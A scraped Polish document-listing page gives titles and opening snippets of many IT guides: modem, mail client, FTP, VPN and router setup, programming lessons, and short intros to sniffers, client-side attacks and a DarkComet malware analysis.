Instrukcja szybkiej instalacji. Przed przystąpieniem do instalacji należy zgromadzić w zasięgu ręki wszystkie potrzebne informacje i urządzenia.

Instrukcja szybkiej instalacji. Przed przystąpieniem do instalacji należy zgromadzić w zasięgu ręki wszystkie potrzebne informacje i urządzenia. Instrukcja szybkiej instalacji Do konfiguracji modemu może posłużyć dowolna nowoczesna przeglądarka np. Internet Explorer 6 lub Netscape Navigator 6.2.3. DSL-300T ADSL Modem Przed rozpoczęciem Przed przystąpieniem

Bardziej szczegółowo

Konfiguracja konta pocztowego w Thunderbird

Konfiguracja konta pocztowego w Thunderbird Konfiguracja konta pocztowego w Thunderbird Sygnity SA 2013 Wszystkie prawa zastrzeżone. Znaki firmowe oraz towarowe użyte w opracowaniu są prawną własnością ich właścicieli. Autor dokumentacji: Magdalena

Bardziej szczegółowo

Ustalanie dostępu do plików - Windows XP Home/Professional

Ustalanie dostępu do plików - Windows XP Home/Professional Ustalanie dostępu do plików - Windows XP Home/Professional Aby edytować atrybuty dostępu do plikow/ katalogow w systemie plików NTFS wpierw sprawdź czy jest Wyłączone proste udostępnianie czyli przejdź

Bardziej szczegółowo

NetDrive czyli jak w prosty sposób zarządzać zawartością FTP

NetDrive czyli jak w prosty sposób zarządzać zawartością FTP NetDrive czyli jak w prosty sposób zarządzać zawartością FTP W razie jakichkolwiek wątpliwości, pytań lub uwag odnośnie niniejszego dokumentu proszę o kontakt pod adresem info@lukaszpiec.pl. Można także

Bardziej szczegółowo

Projektowanie bezpieczeństwa sieci i serwerów

Projektowanie bezpieczeństwa sieci i serwerów Projektowanie bezpieczeństwa sieci i serwerów Konfiguracja zabezpieczeń stacji roboczej 1. Strefy bezpieczeństwa przeglądarki Internet Explorer. W programie Internet Explorer można skonfigurować ustawienia

Bardziej szczegółowo

1 Podstawy c++ w pigułce.

1 Podstawy c++ w pigułce. 1 Podstawy c++ w pigułce. 1.1 Struktura dokumentu. Kod programu c++ jest zwykłym tekstem napisanym w dowolnym edytorze. Plikowi takiemu nadaje się zwykle rozszerzenie.cpp i kompiluje za pomocą kompilatora,

Bardziej szczegółowo

S P I S T R E Ś C I. Instrukcja obsługi

S P I S T R E Ś C I. Instrukcja obsługi S P I S T R E Ś C I Instrukcja obsługi 1. Podstawowe informacje o programie.................................................................................... 2 2. Instalacja programu.....................................................................................................

Bardziej szczegółowo

KONFIGURACJA USŁUGI ZSIMED NA SERWERZE ZDALNYM

KONFIGURACJA USŁUGI ZSIMED NA SERWERZE ZDALNYM KONFIGURACJA USŁUGI ZSIMED NA SERWERZE ZDALNYM Spis treści Wstęp... 2 1. Zarządzanie usługą... 2 1.1. Instalacja usługi ZSIMED... 2 1.2. Inicjowanie usługi ZSIMED... 3 1.3. Zatrzymanie usługi... 3 1.4.

Bardziej szczegółowo

Zbieranie podstawowych śladów działalności.

Zbieranie podstawowych śladów działalności. Zwalczanie Laboratorium 4. Zbieranie podstawowych śladów działalności.. Ślady pozostawione na komputerze można podzielić na dwie kategorie: ulotne i nieulotne. Nieulotne to te, które pozostają na komputerze

Bardziej szczegółowo

Propozycje projektów (gniazdka)

Propozycje projektów (gniazdka) Programowanie w środowisku sieciowym Propozycje projektów (gniazdka) 1. Gra sieciowa Serwer i klient dowolnej gry turowej. Zaimplementowanie podstawowych zasad i reguł gry. Serwer przechowuje listę podłączonych

Bardziej szczegółowo

Architektura typu klient serwer: przesyłanie pliku tekstowo oraz logowania do serwera za pomocą szyfrowanego hasła

Architektura typu klient serwer: przesyłanie pliku tekstowo oraz logowania do serwera za pomocą szyfrowanego hasła Architektura typu klient serwer: przesyłanie pliku tekstowo oraz logowania do serwera za pomocą szyfrowanego hasła Wydział Inżynierii Mechanicznej i Informatyki Instytut Informatyki Teoretycznej i Stosowanej

Bardziej szczegółowo

INSTRUKCJA INSTALACJI I OBSŁUGI ZBIORCZE E-DEKLARCJE. dla Księgi PiR oraz Płac DOS

INSTRUKCJA INSTALACJI I OBSŁUGI ZBIORCZE E-DEKLARCJE. dla Księgi PiR oraz Płac DOS INSTRUKCJA INSTALACJI I OBSŁUGI ZBIORCZE E-DEKLARCJE dla Księgi PiR oraz Płac DOS I. Instalacja Programu Dla programów DOS ( Płace i Księga) Instalacja musi odbyć się na serwerze w folderze głównym Księga.

Bardziej szczegółowo

BGK@24Biznes Pierwsze kroki w systemie 2014-11-27 2011-11-21

BGK@24Biznes Pierwsze kroki w systemie 2014-11-27 2011-11-21 BGK@24Biznes Pierwsze kroki w systemie 2014-11-27 2011-11-21 BGK@24Biznes Dziękujemy Państwu za wybranie usługi bankowości elektronicznej Banku Gospodarstwa Krajowego BGK@24Biznes. Nasz system bankowości

Bardziej szczegółowo

Przykładowa konfiguracja konta pocztowego w programie Outlook Express z wykorzystaniem MKS 2k7 (MS Windows 2000 Proessional)

Przykładowa konfiguracja konta pocztowego w programie Outlook Express z wykorzystaniem MKS 2k7 (MS Windows 2000 Proessional) Przykładowa konfiguracja konta pocztowego w programie Outlook Express z wykorzystaniem MKS 2k7 (MS Windows 2000 Proessional) KROK NR 1: Uruchamiamy program Outlook Express. Jesteśmy proszeni o nazwę tożsamości.

Bardziej szczegółowo

Snifery wbudowane w Microsoft Windows

Snifery wbudowane w Microsoft Windows Snifery wbudowane w Microsoft Windows Prezentację przygotowali: Robert Milczarski Łukasz Stegliński Maciej Łaski Network Monitorw w Microsoft Windows Server 2003 Wbudowany w Windows monitor sieci wykorzystywany

Bardziej szczegółowo

Dokumentacja Administratora portalu. aplikacji. Wirtualna szkoła

Dokumentacja Administratora portalu. aplikacji. Wirtualna szkoła Dokumentacja Administratora portalu aplikacji Wirtualna szkoła aktualna na dzień 20.12.2012 Wykonawca: Young Digital Planet SA 2012 Strona 2 z 15 Spis Treści Wirtualna szkoła SYSTEM ZARZĄDZANIA NAUCZANIEM...

Bardziej szczegółowo

INSTRUKCJA INSTALACJI SYSTEMU

INSTRUKCJA INSTALACJI SYSTEMU Zarządzanie Procesami Informatycznymi Sp. z o.o. 54-204 Wrocław, ul. Legnicka 62 Tel. : ( 071 ) 354 88 88 Fax : ( 071 ) 354 88 99 E-mail : biuro@vilico.pl INSTRUKCJA INSTALACJI SYSTEMU Wersja 1.4-1 - Spis

Bardziej szczegółowo

Na komputerach z systemem Windows XP zdarzenia są rejestrowane w trzech następujących dziennikach: Dziennik aplikacji

Na komputerach z systemem Windows XP zdarzenia są rejestrowane w trzech następujących dziennikach: Dziennik aplikacji Podgląd zdarzeń W systemie Windows XP zdarzenie to każde istotne wystąpienie w systemie lub programie, które wymaga powiadomienia użytkownika lub dodania wpisu do dziennika. Usługa Dziennik zdarzeń rejestruje

Bardziej szczegółowo

Technik informatyk. pierwszy próbny egzamin zawodowy w ostatniej klasie technikum i szkoły policealnej

Technik informatyk. pierwszy próbny egzamin zawodowy w ostatniej klasie technikum i szkoły policealnej Technik informatyk pierwszy próbny egzamin zawodowy w ostatniej klasie technikum i szkoły policealnej Informacje dla nauczyciela sprawdzającego prace egzaminacyjne Copyright by Wydawnictwa Szkolne i Pedagogiczne

Bardziej szczegółowo

Telnet. Telnet jest najstarszą i najbardziej elementarną usługą internetową.

Telnet. Telnet jest najstarszą i najbardziej elementarną usługą internetową. Telnet Telnet jest najstarszą i najbardziej elementarną usługą internetową. Telnet standard protokołu komunikacyjnego używanego w sieciach komputerowych do obsługi odległego terminala w architekturze klient-serwer.

Bardziej szczegółowo

Instrukcja konfiguracji funkcji skanowania

Instrukcja konfiguracji funkcji skanowania Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji

Bardziej szczegółowo

Rozdział 6 - Z kim się kontaktować - 199 - Spis treści. Wszelkie prawa zastrzeżone WiedzaTech sp. z o.o. 2012. Kopiowanie bez zezwolenia zabronione.

Rozdział 6 - Z kim się kontaktować - 199 - Spis treści. Wszelkie prawa zastrzeżone WiedzaTech sp. z o.o. 2012. Kopiowanie bez zezwolenia zabronione. Rozdział 6 - Z kim się kontaktować - 199 - Spis treści - 200 - Rozdział 6 - Z kim się kontaktować Spis treści Rozdział 1: Podstawy bezpiecznego użytkowania komputera... - 3 - Dlaczego należy aktualizować

Bardziej szczegółowo

Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@

Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@ Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@ 24 marzec, 2014 Wstęp Tydzień temu do wielu skrzynek pocztowych w Polsce trafił email z linkiem do pliku podszywającego się pod nową aktualizację

Bardziej szczegółowo

Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera.

Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera. Zanim zaczniesz. Warto ustawić kartę sieciową naszego serwera. Wchodzimy w Centrum sieci -> Połączenia sieciowe -> następnie do właściwości naszej karty sieciowej. Następnie przechodzimy do Protokół internetowy

Bardziej szczegółowo

- dyrektor firmy wezwał serwis w celu zdiagnozowania i usunięcia usterek gdyż zauważono nieprawidłowości w działaniu systemu komputerowego,

- dyrektor firmy wezwał serwis w celu zdiagnozowania i usunięcia usterek gdyż zauważono nieprawidłowości w działaniu systemu komputerowego, 1. Projekt realizacji prac prowadzących do zlokalizowania i usunięcia usterek systemu komputerowego w zakresie diagnozowania wstępnego, ustalenia przyczyn usterek i usunięcia usterek.. 2. Założenia do

Bardziej szczegółowo

Kancelaria Prawna.WEB - POMOC

Kancelaria Prawna.WEB - POMOC Kancelaria Prawna.WEB - POMOC I Kancelaria Prawna.WEB Spis treści Część I Wprowadzenie 1 Część II Wymagania systemowe 1 Część III Instalacja KP.WEB 9 1 Konfiguracja... dostępu do dokumentów 11 Część IV

Bardziej szczegółowo

Protokół wymiany sentencji, wersja 1

Protokół wymiany sentencji, wersja 1 Protokół wymiany sentencji, wersja 1 Sieci komputerowe 2011@ MIM UW Osowski Marcin 28 kwietnia 2011 1 Streszczenie Dokument ten opisuje protokół przesyłania sentencji w modelu klientserwer. W założeniu

Bardziej szczegółowo

Instrukcja obsługi programu ODGiK-NET 1.5

Instrukcja obsługi programu ODGiK-NET 1.5 ODGiK Warszawa Instrukcja obsługi programu ODGiK-NET 1.5 Instrukcja przeznaczona do rozpowszechniania tylko przez ODGiK w Warszawie (c) Jacek Derwisz 2002 INFORMACJA Zwracamy uwagę na dokładne wypełnienie

Bardziej szczegółowo

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH.

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH. Spis treści 1. Konfiguracja poczty Exchange dla klienta pocztowego Outlook 2007 protokół Exchange

Bardziej szczegółowo

Aplikacja formularza internetowego R-ZW-S

Aplikacja formularza internetowego R-ZW-S Aplikacja formularza internetowego R-ZW-S Badanie pogłowia świń oraz produkcji żywca wieprzowego Instrukcja obsługi aplikacji Spis Treści 1. Zakres i wymagania systemowe aplikacji... 2 2. Instalacja i

Bardziej szczegółowo

- komputer (stacja robocza) ma być naprawiony i skonfigurowany w siedzibie firmy,

- komputer (stacja robocza) ma być naprawiony i skonfigurowany w siedzibie firmy, 1. Projekt realizacji prac prowadzących do zlokalizowania i usunięcia usterek systemu komputerowego, zgłoszonych do serwisu InfKomp przez właściciela firmy ROLMASZ, w zakresie: diagnozowania wstępnego,

Bardziej szczegółowo

Pracownia internetowa w każdej szkole (edycja jesień 2005)

Pracownia internetowa w każdej szkole (edycja jesień 2005) Instrukcja numer SPD3/15_03/Z Pracownia internetowa w każdej szkole (edycja jesień 2005) Opiekun pracowni internetowej cz. 3 Podsłuch w sieci (PD3) Wstęp Niniejsza instrukcja ma na celu zasygnalizowanie

Bardziej szczegółowo

Księgarnia internetowa Lubię to!» Nasza społeczność

Księgarnia internetowa Lubię to!» Nasza społeczność Kup książkę Poleć książkę Oceń książkę Księgarnia internetowa Lubię to!» Nasza społeczność SPIS TREŚCI Drodzy Uczniowie!........................................... 5 Rozdział 1. Bezpieczne posługiwanie

Bardziej szczegółowo

Instrukcja podłączenia bramki IP 1R+L oraz IP 2R+L w trybie serwisowym za pomocą usługi telnet.

Instrukcja podłączenia bramki IP 1R+L oraz IP 2R+L w trybie serwisowym za pomocą usługi telnet. Tryb serwisowy Instrukcja podłączenia bramki IP 1R+L oraz IP 2R+L w trybie serwisowym za pomocą usługi telnet. Bramka IP 2R+L oraz IP 1 R+L może zostać uruchomiana w trybie serwisowym. W przypadku wystąpienia

Bardziej szczegółowo

Rozdział ten zawiera informacje na temat zarządzania Modułem Modbus TCP oraz jego konfiguracji.

Rozdział ten zawiera informacje na temat zarządzania Modułem Modbus TCP oraz jego konfiguracji. 1 Moduł Modbus TCP Moduł Modbus TCP daje użytkownikowi Systemu Vision możliwość zapisu oraz odczytu rejestrów urządzeń, które obsługują protokół Modbus TCP. Zapewnia on odwzorowanie rejestrów urządzeń

Bardziej szczegółowo

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej:

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej: Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej: Router jest podłączony do sieci Internet, natomiast od dostawcy

Bardziej szczegółowo

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek

Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek Router jest podłączony do sieci Internet, natomiast od dostawcy zostaje

Bardziej szczegółowo

Instrukcja logowania do systemu e-bank EBS

Instrukcja logowania do systemu e-bank EBS Instrukcja logowania do systemu e-bank EBS 1. Instalacja programu JAVA Przed pierwszą rejestracją do systemu e-bank EBS na komputerze należy zainstalować program JAVA w wersji 6u7 lub nowszej. Można go

Bardziej szczegółowo

Konfiguracja połączenia szerokopasmowego na Windows98/98SE Instalacja PPPoE w systemie Windows 98 i 98SE

Konfiguracja połączenia szerokopasmowego na Windows98/98SE Instalacja PPPoE w systemie Windows 98 i 98SE Konfiguracja połączenia szerokopasmowego na Windows98/98SE Instalacja PPPoE w systemie Windows 98 i 98SE Aby zainstalować protokół PPPoE, należy wcześniej przygotować system. Przygotowanie polega na aktualizacji

Bardziej szczegółowo

KATEGORIA OBSZAR WIEDZY

KATEGORIA OBSZAR WIEDZY Moduł 7 - Usługi w sieciach informatycznych - jest podzielony na dwie części. Pierwsza część - Informacja - wymaga od zdającego zrozumienia podstawowych zasad i terminów związanych z wykorzystaniem Internetu

Bardziej szczegółowo

Instrukcja konfiguracji i uruchamiania połączenia VPN z systemami SAP

Instrukcja konfiguracji i uruchamiania połączenia VPN z systemami SAP Temat Połączenie z systemami SAP z wykorzystaniem połączenia VPN spoza sieci Uczelni Moduł: BASIS Wersja: 0.12 Data: 2009-05-05 Wersja. Data Wprowadzone zmiany Autor zmian 0.1 2007-12-03 Utworzenie dokumentu

Bardziej szczegółowo

MASKI SIECIOWE W IPv4

MASKI SIECIOWE W IPv4 MASKI SIECIOWE W IPv4 Maska podsieci wykorzystuje ten sam format i sposób reprezentacji jak adresy IP. Różnica polega na tym, że maska podsieci posiada bity ustawione na 1 dla części określającej adres

Bardziej szczegółowo

Lekcja 10. Uprawnienia. Dołączanie plików przy pomocy funkcji include() Sprawdzanie, czy plik istnieje przy pmocy funkcji file_exists()

Lekcja 10. Uprawnienia. Dołączanie plików przy pomocy funkcji include() Sprawdzanie, czy plik istnieje przy pmocy funkcji file_exists() Paweł Gmys PHP strona 1 Lekcja 10 Uprawnienia Aby skrypt PHP mógł odwołać się do pliku, musi mieć odpowiednie uprawnienia. Szczegóły są zależne od serwera. Najczęściej chyba skrypt ma uprawnienia takie,

Bardziej szczegółowo

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego

2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego 2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego produktu. 23 czerwca 2014 Spis treści 3 Spis treści...5

Bardziej szczegółowo

KONFIGURACJA TERMINALA GPON ONT HG8245

KONFIGURACJA TERMINALA GPON ONT HG8245 KONFIGURACJA TERMINALA GPON ONT HG8245 1. Konfiguracja WiFi W domyślnej konfiguracji terminal ONT posiada zdefiniowane 4 port ethernet z dostępem do internetu (w trybie NAT oznacza to że urządzenie klienta

Bardziej szczegółowo

INSTRUKCJA KONFIGURACJI KLIENTA POCZTOWEGO

INSTRUKCJA KONFIGURACJI KLIENTA POCZTOWEGO INSTRUKCJA KONFIGURACJI KLIENTA POCZTOWEGO UWAGA!!! Wskazówki dotyczą wybranych klientów pocztowych Zespół Systemów Sieciowych Spis treści 1. Konfiguracja klienta pocztowego Outlook Express 3 2. Konfiguracja

Bardziej szczegółowo

Instrukcja dotycząca generowania klucza dostępowego do Sidoma v8

Instrukcja dotycząca generowania klucza dostępowego do Sidoma v8 Szanowni Państwo! Instrukcja dotycząca generowania klucza dostępowego do Sidoma v8 Przekazujemy nową wersję systemu SidomaOnLine v8. W celu zalogowania się do systemu niezbędny jest nowy klucz dostępu

Bardziej szczegółowo

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne

Bardziej szczegółowo

FAQ Systemu EKOS. 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen?

FAQ Systemu EKOS. 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen? 27.06.11 FAQ Systemu EKOS 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen? Procedura rejestracji ocen wymaga podpisywania protokołów (w postaci wypełnionych formularzy InfoPath Forms

Bardziej szczegółowo

Sposoby zdalnego sterowania pulpitem

Sposoby zdalnego sterowania pulpitem Karolina Wieczorko, EMiI Sposoby zdalnego sterowania pulpitem Jest wiele opcji zdalnego sterowania pulpitem, począwszy od narzędzi systemowych, poprzez różnego rodzaju programy przez sieć internetową.

Bardziej szczegółowo

Instrukcja obsługi certyfikatów w programie pocztowym MS Outlook Express 5.x/6.x

Instrukcja obsługi certyfikatów w programie pocztowym MS Outlook Express 5.x/6.x Spis treści Wstęp... 1 Instalacja certyfikatów w programie pocztowym... 1 Instalacja certyfikatów własnych... 1 Instalacja certyfikatów innych osób... 3 Import certyfikatów innych osób przez odebranie

Bardziej szczegółowo

Wstęp. Skąd pobrać program do obsługi FTP? Logowanie

Wstęp. Skąd pobrać program do obsługi FTP? Logowanie Wstęp FTP - (ang. File Transfer Protocol - protokół transmisji danych) jest to protokół typu klient-serwer, który umożliwia przesyłanie plików na serwer, oraz z serwera poprzez program klienta FTP. Dzięki

Bardziej szczegółowo

OLIMPIADA INFORMATYCZNA 2010 ROK ETAP SZKOLNY

OLIMPIADA INFORMATYCZNA 2010 ROK ETAP SZKOLNY KOD UCZNIA OLIMPIADA INFORMATYCZNA 2010 ROK ETAP SZKOLNY * Postaw znak x w okienku obok właściwej odpowiedzi. 1. Przybornik w programie Paint to element programu, w którym znajdują się: kolory przyciski

Bardziej szczegółowo

Wykład VI. Programowanie III - semestr III Kierunek Informatyka. dr inż. Janusz Słupik. Wydział Matematyki Stosowanej Politechniki Śląskiej

Wykład VI. Programowanie III - semestr III Kierunek Informatyka. dr inż. Janusz Słupik. Wydział Matematyki Stosowanej Politechniki Śląskiej Wykład VI - semestr III Kierunek Informatyka Wydział Matematyki Stosowanej Politechniki Śląskiej Gliwice, 2013 c Copyright 2013 Janusz Słupik Podstawowe zasady bezpieczeństwa danych Bezpieczeństwo Obszary:

Bardziej szczegółowo

System archiwizacji i konserwacji baz danych MS SQL

System archiwizacji i konserwacji baz danych MS SQL System archiwizacji i konserwacji baz danych MS SQL Autor : Krzysztof Jarecki Spis treści 1. Przeznaczenie systemu... 3 2. Instalacja systemu... 4 3. Konfiguracja archiwizatora... 5 3.1 Przykład archiwizacji

Bardziej szczegółowo

Tytuł: Instrukcja obsługi Modułu Komunikacji internetowej MKi-sm TK / 3001 / 016 / 002. Wersja wykonania : wersja oprogramowania v.1.

Tytuł: Instrukcja obsługi Modułu Komunikacji internetowej MKi-sm TK / 3001 / 016 / 002. Wersja wykonania : wersja oprogramowania v.1. Zakład Elektronicznych Urządzeń Pomiarowych POZYTON sp. z o. o. 42-200 Częstochowa ul. Staszica 8 p o z y t o n tel. : (034) 361-38-32, 366-44-95, 364-88-82, 364-87-50, 364-87-82, 364-87-62 tel./fax: (034)

Bardziej szczegółowo

INSTRUKCJA INSTALACJI OPROGRAMOWANIA MICROSOFT LYNC 2010 ATTENDEE ORAZ KORZYTANIA Z WYKŁADÓW SYNCHRONICZNYCH

INSTRUKCJA INSTALACJI OPROGRAMOWANIA MICROSOFT LYNC 2010 ATTENDEE ORAZ KORZYTANIA Z WYKŁADÓW SYNCHRONICZNYCH INSTRUKCJA INSTALACJI OPROGRAMOWANIA MICROSOFT LYNC 2010 ATTENDEE ORAZ KORZYTANIA Z WYKŁADÓW SYNCHRONICZNYCH Wstęp Warunkiem uczestnictwa w wykładzie zdalnym jest zainstalowanie na komputerze ucznia uczestnika

Bardziej szczegółowo

Wszystkie parametry pracy serwera konfigurujemy w poszczególnych zakładkach aplikacji, podzielonych wg zakresu funkcjonalnego.

Wszystkie parametry pracy serwera konfigurujemy w poszczególnych zakładkach aplikacji, podzielonych wg zakresu funkcjonalnego. Sz@rk Server - konfigurowanie systemu Sz@rk Server jest serwerem aplikacji z wydzieloną logiką biznesową, pracującym w architekturze opartej o usługi (SOA). Dane pomiędzy serwerem i klientami przesyłane

Bardziej szczegółowo

Dokumentacja systemu NTP rekrut. Autor: Sławomir Miller

Dokumentacja systemu NTP rekrut. Autor: Sławomir Miller Dokumentacja systemu NTP rekrut Autor: Sławomir Miller 1 Spis treści: 1. Wstęp 1.1 Wprowadzenie 1.2 Zakres dokumentu 2. Instalacja 2.1 Wymagania systemowe 2.2 Początek 2.3 Prawa dostępu 2.4 Etapy instalacji

Bardziej szczegółowo

Elektroniczne Dzienniki Urzędowe

Elektroniczne Dzienniki Urzędowe Elektroniczne Dzienniki Urzędowe Moduł Komunikacyjny 2009-2013 ABC PRO Sp. z o.o. Wszelkie prawa zastrzeżone. Dokument przeznaczony jest dla podmiotów wydających akty prawne. Zawiera opis przesyłania do

Bardziej szczegółowo

Problemy techniczne SQL Server

Problemy techniczne SQL Server Problemy techniczne SQL Server Co zrobić, jeśli program Optivum nie łączy się poprzez sieć lokalną z serwerem SQL? Programy Optivum, które korzystają z bazy danych umieszczonej na serwerze SQL, mogą być

Bardziej szczegółowo

Język ludzki kod maszynowy

Język ludzki kod maszynowy Język ludzki kod maszynowy poziom wysoki Język ludzki (mowa) Język programowania wysokiego poziomu Jeśli liczba punktów jest większa niż 50, test zostaje zaliczony; w przeciwnym razie testu nie zalicza

Bardziej szczegółowo

Opis instalacji i konfiguracji programu HW Virtual Serial Port z kasą PS3000Net

Opis instalacji i konfiguracji programu HW Virtual Serial Port z kasą PS3000Net Opis instalacji i konfiguracji programu HW Virtual Serial Port z kasą PS3000Net Spis treści Wstęp... 3 Konfiguracja kasy PS3000 Net...4 [45141] Ustawienia TCP/IP...4 [45142] Protokół Kasa-PC...4 Instalacja

Bardziej szczegółowo

Konfiguracja podglądu obrazu z kamery IP / rejestratora BCS przez sieć LAN.

Konfiguracja podglądu obrazu z kamery IP / rejestratora BCS przez sieć LAN. Konfiguracja podglądu obrazu z kamery IP / rejestratora BCS przez sieć LAN. Aby oglądać obraz z kamery na komputerze za pośrednictwem sieci komputerowej (sieci lokalnej LAN lub Internetu), mamy do dyspozycji

Bardziej szczegółowo

Instrukcja obsługi aplikacji

Instrukcja obsługi aplikacji Formularz koniunktury w gospodarstwie rolnym AK-R Instrukcja obsługi aplikacji Spis Treści 1. Zakres i wymagania systemowe aplikacji... 2 2. Instalacja i uruchomienie aplikacji... 2 3. Zasady pracy z aplikacją...

Bardziej szczegółowo

do instrukcja while (wyrażenie);

do instrukcja while (wyrażenie); Instrukcje pętli -ćwiczenia Instrukcja while Pętla while (póki) powoduje powtarzanie zawartej w niej sekwencji instrukcji tak długo, jak długo zaczynające pętlę wyrażenie pozostaje prawdziwe. while ( wyrażenie

Bardziej szczegółowo

TELEFONIA INTERNETOWA

TELEFONIA INTERNETOWA Politechnika Poznańska Wydział Elektroniki i Telekomunikacji Katedra Sieci Telekomunikacyjnych i Komputerowych TELEFONIA INTERNETOWA Laboratorium TEMAT ĆWICZENIA INSTALACJA I PODSTAWY SERWERA ASTERISK

Bardziej szczegółowo

Data modyfikacji: 2013-08-14

Data modyfikacji: 2013-08-14 Data modyfikacji: 2013-08-14 Co zawiera ten dokument: Ten dokument przedstawia, w jaki sposób zainstalować program Kancelaris PLUS 4 za pomocą standardowego instalatora na serwerze MySQL w wersji 5.0 i

Bardziej szczegółowo

Protokół powykonawczy

Protokół powykonawczy Warszawa, 23.03.2011 Protokół powykonawczy 1. Komputery PC a. Komputer - Serwer1 IP: 192.168.5.3 Brak antywirusa Instalacja darmowego antywirusowego ClamAV, instalacja najnowszych sygnatur wirusów, Skanowanie

Bardziej szczegółowo

Instrukcja obsługi aplikacji Karty Pojazdów dla Dealerów Samochodowych

Instrukcja obsługi aplikacji Karty Pojazdów dla Dealerów Samochodowych Instrukcja obsługi aplikacji Karty Pojazdów dla Dealerów Samochodowych ver. 0.6 1 Instalacja 1. Proces instalacji należy rozpocząć od sprawdzenia, czy w systemie MS Windows jest zainstalowana aplikacja

Bardziej szczegółowo